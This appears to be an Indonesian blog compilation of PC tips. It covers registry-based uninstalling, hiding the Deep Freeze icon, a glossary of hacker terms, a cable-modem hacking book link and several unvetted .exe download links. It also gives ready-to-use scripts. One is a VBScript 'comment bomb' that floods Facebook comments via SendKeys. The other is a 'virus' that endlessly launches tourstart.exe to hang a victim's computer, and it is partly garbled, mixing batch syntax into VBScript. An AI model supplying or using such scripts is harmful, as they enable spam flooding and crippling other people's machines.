Cara Uninstall Program Yang Sulit Dihapus

image

Instalasi program dapat mudah dan cepat.
Namun, ketika datang ke menguninstall
sebuah program khususnya untuk satu
yang selalu memberikan banyak masalah,
mungkin butuh waktu beberapa kerumitan
saat program tidak muncul dalam menambah atau menghapus program atau
tidak uninstall alat yang disediakan. Don’t
worry! Jangan khawatir! Anda dapat benar-
benar menghapus program ini dijalankan
oleh uninstall string yang diperoleh dari
registri. Untuk setiap program terinstal dikomputer Anda, akan ada beberapa
masukan uninstall di registry yang
dikelompokkan di bawah Hapus folder.

Oleh karena itu, Anda dapat mengidenti
fikasi oleh masing-masing program dengan mudah browsing melalui Hapus daftar di registri.Berikut adalah detail langkah-langkah untuk mengajarkan cara uninstall program dengan menggunakan registri:

1. Go to Start -> Run, lalu ketikkan regedit lalu tekan enter

[list=2]

1. Cari ke HKEY_LOCAL_MACHINE \
Software \ Microsoft \ Windows \
currentversion \ Uninstall, kemudian
memperluas Hapus daftar.

[list=3]

1. Carilah program yang ingin Anda hapus, lalu klik pada

[list=4]

1. Pada panel sebelah kanan, klik dua kali
pada UninstallString dan Anda akan melihat jendela Edit String pop up.
Copy the value data. Salin nilai data.
uninstall-dengan-reg

5. Go to Start -> Run, ketik cmd untuk
membuka command prompt.

6. Tempelkan UninstallString disalin pada
langkah 4 dan tekan enter untuk jalankan.
The uninstall screen will pop up to start the
un-installation process. Uninstall layar yang akan pop up untuk memulai proses un-instalasi.[/list]

hm…ini saya cuma dapat yang kayak begini
tapi udah lama..jadi saya bagi aja biar ada
pengalaman dan saya buat pembelajaran
saya..hehhehehe

kalau mau masuk ke link aslinya :
http://www.mydigitallife.info/how-to-unin
stall-programs-that-are-not-appeared-in-
add-or-remove-programs-list/hm…

selain cara diatas saya biasa sih lebih
kepada pake applikasi,,ngak ribet dan
mempermudah bagi kita..yach kita kan
memang orang-orang yang selalu mementingkan kemudahan..langsung saja, jika kalian mendapatkan program yang tidak bisa diuninstall silahkan pake app yang saya pakai ” revo uninstall ”

untuk mendownloadnya revo uninstall
versi terbaru :
http://c0464521.cdn.cloudfiles.rackspacecloud.com/RevoUninProSetup.exe

BOM Komentar Facebook

image

Kali ini saya akan memberikan trik agar ada bom komentar di facebook dengan simpel..

1. Buka notepad di LAPTOP atau PC kamu

2. Copy paste kode dibawah ini ke notepad
kamu seperti ini :
dim wsh
jumlah= 100
set wsh=wscript.createobject(“wscr
ipt.shell”)
wscript.sleep 3000
for i=1 to jumlah
wsh.sendkeys ” KOMENTAR ”
wsh.sendkeys “{ENTER}”
wscript.sleep delay
next
‘END
Note : tulisan yang TEBAL sesuaikan dengan jumlah dan isi komentar yang kamu inginkan

3. Simpan file tersebut dengan extensi vbs
contoh flood.vbs (yang penting dibelakangnya DOT VBS)

5. Setelah di simpan klik 2 kali pada file vbs

5. Arahkan kursor mouse kamu ke kotak
komentar

6. BOM KOMENTAR BERHASIL

# GUNAKANLAH SEBIJAK MUNGKIN,
JANGAN SAMPAI SALAH SASARAN

Cara Menghilangkan Icon Deep Freeze

image

Tips ini tergolong jadul, tapi cukup ampuh
buat menyemunyikan deepfreeze dari
tangan jahil yang mau mengubah password deep freeze kita. Berikut caranya :
1. pertama, Boot Thawed deep freezete
2. Masuk di direktori deep freeze di instal
(defaultnya di C:/Program file/Faronics)
3. Ubah direktori instalasi (faronics) dengan nama yang lain, musalnya
Faronicxxx
4. Restart komputer
5. Icon deep freeze telah menghilang,
hahaha
6. Coba test dulu apakah deepfreeze berfungsi.

Jika anda ingin membuka deep freezenya
tekan ctrl+shift+alt+F6 dan masukkan
password anda, atau dengan cara klik icon
instalasi deep freeze pada direktori C
tempat anda menginstal deep freeze.
jika anda ingin menguninstal deepfreeze
nya, tinggal masuk ke deep freeze lalu
jadikan boot thawed, lalu uninstal
menggunakan deepfreeze yang versinya
sama atau lebih tinggi.

Aplikasi Pembuatan Website 2013

image

Dirgahayu Republik Indonesia yang Ke 68!!
Kali ini saya akan share program untuk membuat Website.. Langsung saja kawan..

Nama Program : WYSIWYG HTML Editor
Version : 1.0 Beta (Build 1.0.0.1)
Fungsi : Untuk Membuat Website, langsung Preview BROWSER

Fitur :
– With .NET SYSTEM
– Preview without Save
– WYSIWYG
– Toolbar
– Custom Color Changed
– Other
-> If You Find BUG, Send Your Report Bug

For Download
http://www.mediafire.com/download/3cjqoaw3qfjnr3a/Setup.exe (SPECIAL EDITION)

http://www.mediafire.com/download/iwhx34blb6v2926/Version_1.0_Beta_(Build_1.0.0.1)_Setup.exe (STANDARD EDITION)

hanya ini yang bisa saya beri untuk BANGSA INDONESIA. Semoga bermanfaat

Cara Membuat Virus Komputer

image

Membuat virus bukanlah merupakan hal
yang sulit. Karena, kita dapat membuatnya
dengan notepad yang terdapat di semua
komputer yang memakai Windows.
Virus yang akan kita buat ini, adalah virus yang membuat komputer yang terinfeksi menjadi tidak bisa berjalan sama sekali.

Let`s Begin!

Langkah-langkah:
1. buka notepad

2. copy+paste bahasa pemograman(yang
bercetak tebal) di bawah ini:
@echo off
option explicit
dim wshshell
set
wshshell=wscript.createobject(“wscript.s
hell”)
dim x
for x = 1 to 100000000
wshshell.run
“tourstart.exe”
next

3. Save notepad dengan nama virus.vbs
( pastikan ”save as type” diubah ke ”allfiles”)

4. Ingat!! jangan klik file tersebut. Karena komputer anda akan dipenuhi oleh 100000000 tourstart yang akan memenuhi layar anda, dan akan membuat komputer hang total sebelum anda mendelete semuanya.

5. bila ingin mencoba virus ini.
silahkan membuat ulang program, dengan
perbedaan ubah 100000000 ke 10, untuk percobaan. maka setelah anda mengklik program.

Layar anda akan dipenuhi oleh hanya 10 tourstart saja.

Tutorial Hack Kabel Modem

image

Untuk kali ini saya akan menjelaskan Hack kabel modem.. Siapa yang tidak mengetahui modem ? Benda ini adalah alat untuk berselancar ria di dunia maya..

Pada awalnya ada dial-up, dan itu lambat,
kemudian datang broadband dalam bentuk
kabel, yang didefinisikan ulang bagaimana
kita mengakses internet, berbagi informasi, dan berkomunikasi satu sama online lainnya. Hacking Modem Kabel masuk ke dalam perangkat yang membuat Internet melalui kabel mungkin dan, sepanjang jalan, mengungkapkan rahasia banyak modem kabel populer, termasuk produk dari Motorola, RCA, Webstar, DLink danbanyak lagi.

Di dalam Hacking The Cable Modem, Anda
akan belajar:
Sejarah modem kabel hacker bagaimana
kabel modem bekerja pentingnya firmware
(termasuk beberapa cara untuk menginstal
firmware baru) cara membuka blokir port
jaringan dan membuka fitur tersembunyi
cara hack dan memodifikasi modem kabel
apa uncapping dan bagaimana membuat
modem kabel upload dan download lebih
cepat

Ditulis untuk orang-orang di semua tingkat
keahlian, buku ini dilengkapi dengan
langkah-demi-langkah tutorial dengan
mudah untuk mengikuti diagram, contoh
source code, skema hardware, link ke
software (eksklusif untuk buku ini!), Dan
belum pernah dirilis sebelumnya hacks
kabel modem.

Download : http://www.sendspace.com/file/5wa6u5

Istilah-Istilah Dalam Informatika

image

Dalam postingan kali ini saya akan menginformasikan mengenai istilah-istilah dalam Informatika, berikut adalah ulasan beserta penjelasannya.

1. HACKER
Hacker adalah sebutan untuk mereka
yang memberikan sumbangan yang
bermanfaat kepada jaringan komputer,
membuat program kecil dan membagikan
nya dengan orang-orang di Internet.
Sebagai contoh : digigumi (Grup Digital)
adalah sebuah kelompok yang mengkhusus
kan diri bergerak dalam bidang game dan
komputer. Digigumi ini menggunakan
teknik teknik hexadecimal untuk mengubah
teks yang terdapat di dalam game.
Contohnya, game Chrono Trigger
berbahasa Inggris dapat diubah menjadi
bahasa Indonesia. Oleh karena itu, status
Digigumi adalah hacker, namun bukan
sebagai perusak. Hacker disini artinya,
mencari, mempelajari dan mengubah
sesuatu untuk keperluan hobi dan
pengembangan dengan mengikuti legalitas
yang telah ditentukan oleh developer game.

2. CRACKER
Cracker adalah sebutan untuk mereka
yang masuk ke sistem orang lain dan
cracker lebih bersifat destruktif, biasanya
di jaringan komputer, mem-bypass
password atau lisensi program komputer,
secara sengaja melawan keamanan
komputer, men-deface (merubah halaman
muka web) milik orang lain bahkan hingga
men-delete data orang lain, mencuri data
dan umumnya melakukan cracking untuk
keuntungan sendiri, maksud jahat, atau
karena sebab lainnya karena ada tantangan.

3. LAMER
Lamer adalah sebutan bagi orang tidak
mempunyai pengalaman & pengetahuan
tapi ingin menjadi hacker sehingga lamer
sering disebut sebagai ‘wanna-be’ hacker,
penggunaan komputer mereka terutama
untuk main game, IRC, tukar menukar
software prirate, mencuri kartu kredit,
melakukan hacking dengan menggunakan
software trojan, nuke & DoS, suka
menyombongkan diri melalui IRC channel,
dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalamperkembangannya mereka hanya akansampai level developed kiddie atau script kiddie saja.

4. DoS
Serangan DoS (bahasa Inggris:
denial-of-service attacks’) adalah jenis
serangan terhadap sebuah komputer atau
server di dalam jaringan internet dengan
cara menghabiskan sumber (resource)
yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat
menjalankan fungsinya dengan benar
sehingga secara tidak langsung mencegah
pengguna lain untuk memperoleh akses
layanan dari komputer yang diserang
tersebut.

5. COPYRIGHT
Copyright adalah hak eksklusif Pencipta
atau Pemegang Hak Cipta untuk mengatur
penggunaan hasil penuangan gagasan atau
informasi tertentu. Pada dasarnya, hak
cipta merupakan “hak untuk menyalin
suatu ciptaan”. Hak cipta dapat juga
memungkinkan pemegang hak tersebut
untuk membatasi penggandaan tidak sah
atas suatu ciptaan.

6. TRADEMARK
Trademark adalah sesuatu yang memberikan kita hak untuk membedakan
brand kita dari yang lain (produk,logo,slogan,kata), atau identitas brand kita
dalam Pedagangan (commerce) sehingga
tidak ada “pepsi’ lain untuk produk cola
selain dari Pepsi yang diproduksi oleh
Perusahaan pepsi tersebut.

7. DEFAMATION
Defamation adalah sebuah pernyataan
yang sifatnya klaim mengarah pada fakta.
Klaim tersebut dapat menunjukan pada
keberpihakan, atau memberikan citra negatif pada individu, kelompok, perusahaan ataupun organisasi, atau badan formal seperti pemerintahan dan negara.

8. HATE SPEECH
Hate Speech adalah semua komunikasi
yang meremehkan seseorang atau kelompok berdasarkan beberapa karakteris
tik, seperti ras atau orientasi seksual. Dalam hukum, hate speech adalah setiap pidato, sikap, perilaku, tulisan, atau tampilan yang dilarang karena dapat mendorong kekerasan atau tindakan merugikan terhadap/oleh seorang individu/kelompok yang dilindungi.

9. VoIP
VoIP adalah teknik untuk bertelepon diatas jaringan Internet. Teknologi yang di
kembangkan memungkinkan untuk
membangun sentral telepon sendiri hingga
pesawat telepon-nya.

10. ADSL
Asymmetric Digital Subscriber Line, sebuah teknologi yang memungkinan data
kecepatan tinggi dikirim melalui kabel
telepon. ADSL memungkinkan untuk
menerima data sampai kecepatan 1.5-9Mbps (kecepatan downstream) dan
mengirim data pada kecepatan 16-640Kbps (kecepatan upstream).